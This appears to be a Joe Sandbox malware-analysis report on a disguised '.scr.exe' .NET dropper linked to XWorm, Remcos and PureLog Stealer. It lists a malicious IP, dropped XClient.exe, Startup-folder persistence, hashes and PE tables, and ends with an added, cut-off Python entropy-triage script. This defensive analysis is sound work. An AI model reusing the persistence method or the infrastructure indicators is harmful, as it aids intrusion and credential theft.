https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 0000000E.00000002.2354647284.0000000005496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.00000000056C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft.c | powershell.exe, 00000007.00000002.2251654421.0000000002944000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.miSt | powershell.exe, 0000000A.00000002.2322743130.000000000725D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microR | powershell.exe, 00000004.00000002.2232645049.0000000008764000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.250.180.178 | unknown | United States | 9009 | M247GB | true
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1566987
                                              Start date and time:2024-12-02 22:04:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@15/21@0/1
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 322
                                              • Number of non-executed functions: 5
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 1176 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 4180 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: THITWNSEI24112908089786756456545346568789-00010.scr.exe
Time | Type | Description
16:05:02 | API Interceptor | 7240393x Sleep call for process: THITWNSEI24112908089786756456545346568789-00010.scr.exe modified
16:05:07 | API Interceptor | 45x Sleep call for process: powershell.exe modified
22:05:33 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Match | Associated Sample Name / URL | Detection | Threat Name
104.250.180.178 | SKM_BH450i2411261138090453854974574748668683985857435.scr.exe | malicious | PureLog Stealer, XWorm
| #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | malicious | PureLog Stealer, Remcos
| Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, Remcos
| CI-PL- HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, XWorm
| Doc089776867565357609 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe | malicious | Remcos
| PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe | malicious | XWorm
| rSOD219ISF-____.scr.exe | malicious | Remcos
| rWWTLCLtoUSADCL.scr.exe | malicious | XWorm
| ttCOg61bOg.exe | malicious | Remcos
| SKM_C364e24092511300346565787689900142344656767788755634232343456768953334466870.scr.exe | malicious | Remcos
                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
M247GB | rAttached_updat.vbs | malicious | GuLoader, Remcos | 172.111.247.228
| teste.arm.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 158.46.140.103
| sora.ppc.elf | malicious | Mirai | 38.201.44.7
| la.bot.arm5.elf | malicious | Unknown | 62.216.72.28
| arm7-20241130-2047.elf | malicious | Mirai | 38.206.34.38
| sample.bin.exe | malicious | Unknown | 172.86.76.228
| sample.bin.exe | malicious | Unknown | 172.86.76.228
| EEghgCvQUy.exe | malicious | DanaBot | 172.86.76.246
| 3yb52PgwJ2.exe | malicious | DanaBot | 172.86.76.246
| EEghgCvQUy.exe | malicious | DanaBot | 172.86.76.246
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.34331486778365
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):2232
                                                                  Entropy (8bit):5.381427237108526
                                                                  Encrypted:false
                                                                  SSDEEP:48:JWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8vUyus:JLHyIFKL3IZ2KRH9OugMs
                                                                  MD5:7CD349050FB75F338874D108DB3EF401
                                                                  SHA1:8D4CFBC495BF48A3526FB9FA16BF6BA4D498D942
                                                                  SHA-256:54A9F48193B837F609A14F95034B4B825DFED9C9C5BC752D76FCD21409AE4BFE
                                                                  SHA-512:8B4B9290FF9AC242FB4DBB49E6A76172B4BC905EADF96002DF6AEF61D6223BACF508314D077F031526ECEAE2FE82C0AF7B5A1D40B6DD0F07F587EEE4C10D88F9
                                                                  Malicious:false
                                                                  Preview:@...e.................................:..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29
                                                                  Entropy (8bit):3.598349098128234
                                                                  Encrypted:false
                                                                  SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                  MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                  SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                  SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                  SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                  Malicious:false
                                                                  Preview:....### explorer ###..[WIN]r
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 2 20:05:27 2024, mtime=Mon Dec 2 20:05:27 2024, atime=Mon Dec 2 20:05:27 2024, length=516096, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):767
                                                                  Entropy (8bit):5.079666073902899
                                                                  Encrypted:false
                                                                  SSDEEP:12:8gW1244Mpnu8ChKlXIsY//yKLL9xn8d5rjABG+Hkplpj9mV:8hpJDTlXU/9xsABGFppm
                                                                  MD5:1CF15E706DBD064784CFDE02C4F2EA97
                                                                  SHA1:3BC14EC5208F4D9DA5F70DA22A83CD47B79A866E
                                                                  SHA-256:514153F103CC4F789886A5E2E9502C2488F34BA611EFC6FB0274B550F0B9EF41
                                                                  SHA-512:6D085A08EB0F5EBFA8FB0D892A9D2EAF27ED2994E6F46B8D4DB8BDD444223342D915D78ECE77F83BE128A9B94E4E18EF19B48D69B51AA182E867448E7CE377E8
                                                                  Malicious:false
                                                                  Preview:L..................F.... ...r....D..r....D..r....D..........................v.:..DG..Yr?.D..U..k0.&...&.......$..S....)...D......D......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.........................R.o.a.m.i.n.g.....b.2......Y.. .XClient.exe.H......Y...Y......d......................[..X.C.l.i.e.n.t...e.x.e.......\...............-.......[...........m*. .....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......468325...........hT..CrF.f4... ...1#....-...-$..hT..CrF.f4... ...1#....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):516096
                                                                  Entropy (8bit):7.615410059518491
                                                                  Encrypted:false
                                                                  SSDEEP:12288:uNIRt11XXjNZgYjirxY1dZqAi081zY5usx+XtJ:uNIp1XXjNIrq1S02zYx
                                                                  MD5:DD81E5AFCD1A13EEE9F9A28C6CDE2A56
                                                                  SHA1:CF99A76FC406FFD81C62FBF07BD65C80EEAE293F
                                                                  SHA-256:B399F5D239807FE144AD8872B4111002EBC6BB79EA6FAA417DB37F5FF95100EE
                                                                  SHA-512:B63633F877D4436BCD549A5BD79566D7D3EED7D3429AD44580B6F295CAAB9E44F562F45855CAD6DFF60AB5FBADC89C97289C31AAC3B45E7F1DF0476E610004BE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b................0.................. ........@.. .......................@............@.....................................O............................ ......4...p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........d...K......`........)...........................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.....*....0...........s......o.....*".(.....*.0...........s".....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0............o ....+..*.0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.615410059518491
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File size:516'096 bytes
                                                                  MD5:dd81e5afcd1a13eee9f9a28c6cde2a56
                                                                  SHA1:cf99a76fc406ffd81c62fbf07bd65c80eeae293f
                                                                  SHA256:b399f5d239807fe144ad8872b4111002ebc6bb79ea6faa417db37f5ff95100ee
                                                                  SHA512:b63633f877d4436bcd549a5bd79566d7d3eed7d3429ad44580b6f295caab9e44f562f45855cad6dff60ab5fbadc89c97289c31aac3b45e7f1df0476e610004be
                                                                  SSDEEP:12288:uNIRt11XXjNZgYjirxY1dZqAi081zY5usx+XtJ:uNIp1XXjNIrq1S02zYx
                                                                  TLSH:79B4E0986616DA03C59157B80E72F2B52BBC2EDDF501D2079FDA6DEFB836F011C48292
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b................0.................. ........@.. .......................@............@................................
                                                                  Icon Hash:00928e8e8686b000
                                                                  Entrypoint:0x47f5ea
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0xE70462D1 [Sun Oct 26 01:52:17 2092 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al    (repeated to the end of the listing: the bytes following the jmp are zero padding, which the disassembler decodes as this instruction)

The single jmp is the native entry stub of a .NET executable: 0x402000 is ImageBase (0x400000) plus the IAT RVA (0x2000, see the data directories below), the one IAT slot that holds mscoree.dll!_CorExeMain. No unmanaged code of the sample runs before the CLR takes over.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7f598          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x80000          0x5a4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x82000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x7d934          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7d5f0 | 0x7d600 | e6623bac736e308a671138dfef5cf38d | False | 0.881725916001994 | data | 7.62631097980793 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x80000 | 0x5a4 | 0x600 | d22bc83a178d01cdd78faab767ace05a | False | 0.4186197916666667 | data | 4.054232110871496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x82000 | 0xc | 0x200 | 5da70d694fa5a00a6b01d3a467a9b3f6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x80090 | 0x314 | data | - | - | 0.434010152284264
RT_MANIFEST | 0x803b4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
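The section and data-directory tables above are what a static triage script reads first: an executable section whose entropy sits near 8 bits/byte (here .text at 7.63) indicates packed or encrypted content, and a non-zero IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR marks a managed (.NET) executable, which is why the only native import is mscoree.dll!_CorExeMain. The following Python is an added example, not part of Joe Sandbox or of the sample: it parses those structures from raw bytes with the standard library only and applies both checks. The image it analyses is constructed in code (two sections, .text filled with a deterministic SHA-256 chain so it is high-entropy, .rsrc all zeros); only the IAT and CLR-header directory values (0x2000/0x8 and 0x2008/0x48) are reused from the table, everything else about it is an assumption.

```python
"""Static PE triage: section entropy and CLR-header check (added example; stdlib only)."""
import hashlib
import math
import struct

# Data-directory indices in IMAGE_OPTIONAL_HEADER order (PE/COFF specification).
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PACKED_ENTROPY_THRESHOLD = 7.0   # bits/byte; plain native or IL code usually sits well below this


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0 .. 8.0), the measure shown in the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return sum(-(c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(buf: bytes) -> dict:
    """Parse DOS/COFF/optional headers, the data directories and the section headers."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
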